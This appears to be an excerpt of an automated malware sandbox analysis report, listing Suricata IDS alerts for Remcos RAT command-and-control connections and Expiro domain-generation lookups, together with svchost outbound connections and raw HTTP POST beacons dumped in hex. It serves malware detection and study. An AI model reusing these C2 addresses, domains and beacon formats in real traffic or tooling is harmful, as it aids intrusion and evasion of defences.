              Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 34.211.97.45:80 -> 192.168.2.4:49963
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49997 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49765 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50037 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:49767 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50059 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50016 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50077 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2018141 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz : 3.254.94.185:80 -> 192.168.2.4:50123
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50136 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2051651 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (eufxebus .biz) : 192.168.2.4:60155 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2037771 - Severity 1 - ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value btst : 3.254.94.185:80 -> 192.168.2.4:50123
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50096 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50157 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50168 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50175 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50181 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50192 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50198 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50201 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50148 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50209 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50187 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2051654 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (cikivjto .biz) : 192.168.2.4:53939 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50218 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.4:50235 -> 18.208.156.248:80
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50143 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2051653 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (htwqzczce .biz) : 192.168.2.4:59049 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50239 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2051650 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (kcyvxytog .biz) : 192.168.2.4:49265 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2051651 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (eufxebus .biz) : 192.168.2.4:55684 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50153 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50162 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50297 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2051652 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (napws .biz) : 192.168.2.4:62580 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50261 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50226 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2850851 - Severity 1 - ETPRO MALWARE Win32/Expiro.NDO CnC Activity : 192.168.2.4:56539 -> 82.112.184.197:80
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50277 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50285 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56569 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50205 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50327 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50280 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.4:56068 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50331 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56521 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56534 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56554 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56548 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50215 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50233 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56608 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56590 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56602 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56551 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56593 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50340 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56544 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56553 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50244 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56550 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56524 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56565 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56529 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56540 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56604 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56559 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56567 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56606 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50115 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50288 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56607 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2051654 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (cikivjto .biz) : 192.168.2.4:59374 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50319 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50273 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56584 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50324 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50337 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56603 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56526 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2051648 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (przvgke .biz) : 192.168.2.4:61194 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.4:53761 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56541 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50291 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56549 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56598 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2051650 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (kcyvxytog .biz) : 192.168.2.4:53060 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50221 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2051653 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (htwqzczce .biz) : 192.168.2.4:58104 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50303 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2051652 - Severity 1 - ET MALWARE DNS Query to Expiro Domain (napws .biz) : 192.168.2.4:49262 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56557 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56562 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56543 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50313 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56555 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56558 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50334 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50249 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2051649 - Severity 1 - ET MALWARE DNS Query to Expiro Related Domain (knjghuig .biz) : 192.168.2.4:58529 -> 1.1.1.1:53
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50344 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50267 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56536 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56538 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56556 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56596 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56577 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56560 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56547 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56573 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56580 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56587 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50255 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56516 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:56545 -> 204.10.160.212:6622
              Source: Network trafficSuricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.4:50310 -> 204.10.160.212:6622
              System process connects to network (likely due to code injection or exploit)
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 3.254.94.185 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 204.10.160.212 6622Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 3.94.10.34 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 34.246.200.160 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 172.234.222.143 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 18.208.156.248 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 34.211.97.45 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 208.100.26.245 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 35.164.78.200 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 165.160.13.20 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 44.213.104.86 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 44.221.84.105 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 85.214.228.140 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 54.244.188.177 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 13.251.16.150 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 47.129.31.212 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 82.112.184.197 80Jump to behavior
              Source: C:\Windows\SysWOW64\svchost.exeNetwork Connect: 18.141.10.107 80Jump to behavior
              Queries random domain names (often used to prevent blacklisting and sinkholes)
              Source: unknownDNS traffic detected: English language letter frequency does not match the domain names
              Source: unknownNetwork traffic detected: DNS query count 128
              Source: global trafficTCP traffic: 192.168.2.4:49730 -> 204.10.160.212:6622
              Source: global trafficDNS traffic detected: number of DNS queries: 128
              Source: global trafficHTTP traffic detected: POST /bvjounbjkagqnta HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /rsmfnaxurgxpde HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: ssbzmoy.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 786
              Source: global trafficHTTP traffic detected: POST /dqlfliuucamv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778
              Source: global trafficHTTP traffic detected: POST /dqlfliuucamv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778Data Raw: 65 f9 60 f6 44 d4 ab c5 fe 02 00 00 82 71 fd d8 e6 a2 86 96 38 67 10 f6 87 69 a9 0c a1 cc 6c d2 c3 59 c3 3f 86 bf 47 3f 9e 4e 52 2b 9d a3 dc c6 94 31 11 66 da 57 d3 e4 42 97 49 62 8a e6 51 d7 3f c0 de ed c2 c5 65 9b 8f a1 0a e6 29 ed b1 9f f5 39 92 a3 10 ff bf 0a 1f 72 21 0d dc 83 57 8e ba c6 ad d3 ef f4 44 07 cf 0c 40 ab e8 15 2f d1 a4 b3 43 4f 4a 51 21 8c 68 e2 27 d4 5f d1 5c 1e fa 51 d5 c3 67 c9 3d d1 14 03 e5 2d 1b 16 77 e3 ab 77 1e 7e ce 50 5d 85 0f 13 a7 b6 e9 df cc d8 9e 04 2c 56 57 bd f3 24 15 d9 89 40 ca 6a a6 c9 07 e8 9b 7b 59 e6 18 4e 3b 3b 82 f7 eb 9b f3 55 3a 9b af d6 8b 9c 32 c7 17 c5 d6 8c 67 07 7f 6a cc 72 2e d8 b7 99 61 a2 0c 87 ef 35 8d 21 b3 4d 5e 7e a3 81 d4 7b 4d cc 05 8a 45 9e c9 80 4d 17 d9 a6 59 11 4d 07 1e 21 10 d5 1d dc cd 0a a2 14 f0 5f fa ea 75 d4 1e 79 1a 18 87 4e 1e 33 18 f2 e1 30 8c e2 bb e8 9b d6 20 0e 5f 94 b9 10 e8 f4 bb 15 04 00 b8 5f 51 1a c9 64 ef 9c 0c a2 95 9b 7e 54 fa 7e 9f 4b ff 19 0e cd 8a ed fb 99 e7 c5 ee 57 b5 c7 2c c0 97 2e 97 3c 83 99 31 72 ba 65 96 36 87 b4 57 29 b3 0d ab da ca bf 0a c1 46 19 f6 9c 00 a6 2d 09 75 65 7b 43 0d ea 7e 8d 68 dc 85 7b 40 17 9f 33 91 02 78 8f 56 cd 10 7e dc 14 a1 0a e5 1c 78 c7 cb cf 32 a5 53 63 2e fa ac 4c 7b f2 f9 fd fa 23 53 72 37 8b bf 64 a7 ef a1 9b f2 8d 68 99 1a b7 e7 24 26 a1 06 0b 35 29 d3 ad 62 b5 3c 8b 99 d3 be c6 6e bb 67 0c 40 c5 50 ed dd 9b e8 80 27 83 f9 9b 93 90 8a 71 89 f3 ef bc 20 54 d7 3d c9 51 21 dd 5d c8 b2 e3 8a bb 07 63 a0 16 48 9e 35 54 46 fa 0c c5 9e ef 68 76 8b d9 f4 55 84 7f dc 4f 5a a9 91 10 d8 e4 dd 06 49 d8 4d 20 8c 27 39 b5 03 49 a7 d1 61 a4 af 4f d0 11 d4 6b f3 c3 00 57 db c1 8b 26 1f bb 5c 75 a6 37 c0 16 e8 88 c5 20 7c 2b c4 3f f5 cc 0c b4 2b ea fb c9 d9 23 59 7c a6 bb 32 05 c7 06 9c 2c c3 f5 ba 75 41 75 6f 93 9c 0a 23 5a 19 3c 06 ea 93 36 02 78 af 75 f8 6b ba 34 4b e8 4d 25 07 18 bc fc 37 b9 8e 13 98 e1 91 d1 0c 36 39 1f f2 9b f2 99 e4 9e 08 d1 d4 9d 5d 40 ec 34 0d 82 dd b1 00 cf 83 fb 44 3a cc 2f 7e ec 73 c8 2c db 54 ae e1 b2 36 40 84 bc b2 bf 4e be c1 99 82 54 a7 98 b9 63 87 32 90 9a a6 ae c1 6c 06 e5 a4 3c 3a d3 83 07 02 40 6a 20 75 23 9c 38 98 50 82 90 ca 43 af 54 c7 49 a7 ef 1a f8 d9 fa dd 75 50 c7 bd 7d 9c 4f f8 9b b1 72 20 38 45 19 8d a4 31 bd 0e ac a4 7e bf 84 5f 33 34 84 90 f5 9e b9 8d 12 b0 d3 93 f9 9b 14 e0 fb 92 d0 d0 ff 40 e8 03 45 e8 34 f1 d0 24 11 b8 34 5c 0b 47 7d 66 10 Data Ascii: e`Dq8gilY?G?NR+1fWBIbQ?e)9r!WD@/COJQ!h'_\Qg=-ww~P],VW$@j{YN;;U:2gjr.a5!M^~{MEMYM!_uyN30 _
              Source: global trafficHTTP traffic detected: POST /dqlfliuucamv HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: pywolwnvd.bizUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400Content-Length: 778Data Raw: 65 f9 60 f6 44 d4 ab c5 fe 02 00 00 82 71 fd d8 e6 a2 86 96 38 67 10 f6 87 69 a9 0c a1 cc 6c d2 c3 59 c3 3f 86 bf 47 3f 9e 4e 52 2b 9d a3 dc c6 94 31 11 66 da 57 d3 e4 42 97 49 62 8a e6 51 d7 3f c0 de ed c2 c5 65 9b 8f a1 0a e6 29 ed b1 9f f5 39 92 a3 10 ff bf 0a 1f 72 21 0d dc 83 57 8e ba c6 ad d3 ef f4 44 07 cf 0c 40 ab e8 15 2f d1 a4 b3 43 4f 4a 51 21 8c 68 e2 27 d4 5f d1 5c 1e fa 51 d5 c3 67 c9 3d d1 14 03 e5 2d 1b 16 77 e3 ab 77 1e 7e ce 50 5d 85 0f 13 a7 b6 e9 df cc d8 9e 04 2c 56 57 bd f3 24 15 d9 89 40 ca 6a a6 c9 07 e8 9b 7b 59 e6 18 4e 3b 3b 82 f7 eb 9b f3 55 3a 9b af d6 8b 9c 32 c7 17 c5 d6 8c 67 07 7f 6a cc 72 2e d8 b7 99 61 a2 0c 87 ef 35 8d 21 b3 4d 5e 7e a3 81 d4 7b 4d cc 05 8a 45 9e c9 80 4d 17 d9 a6 59 11 4d 07 1e 21 10 d5 1d dc cd 0a a2 14 f0 5f fa ea 75 d4 1e 79 1a 18 87 4e 1e 33 18 f2 e1 30 8c e2 bb e8 9b d6 20 0e 5f 94 b9 10 e8 f4 bb 15 04 00 b8 5f 51 1a c9 64 ef 9c 0c a2 95 9b 7e 54 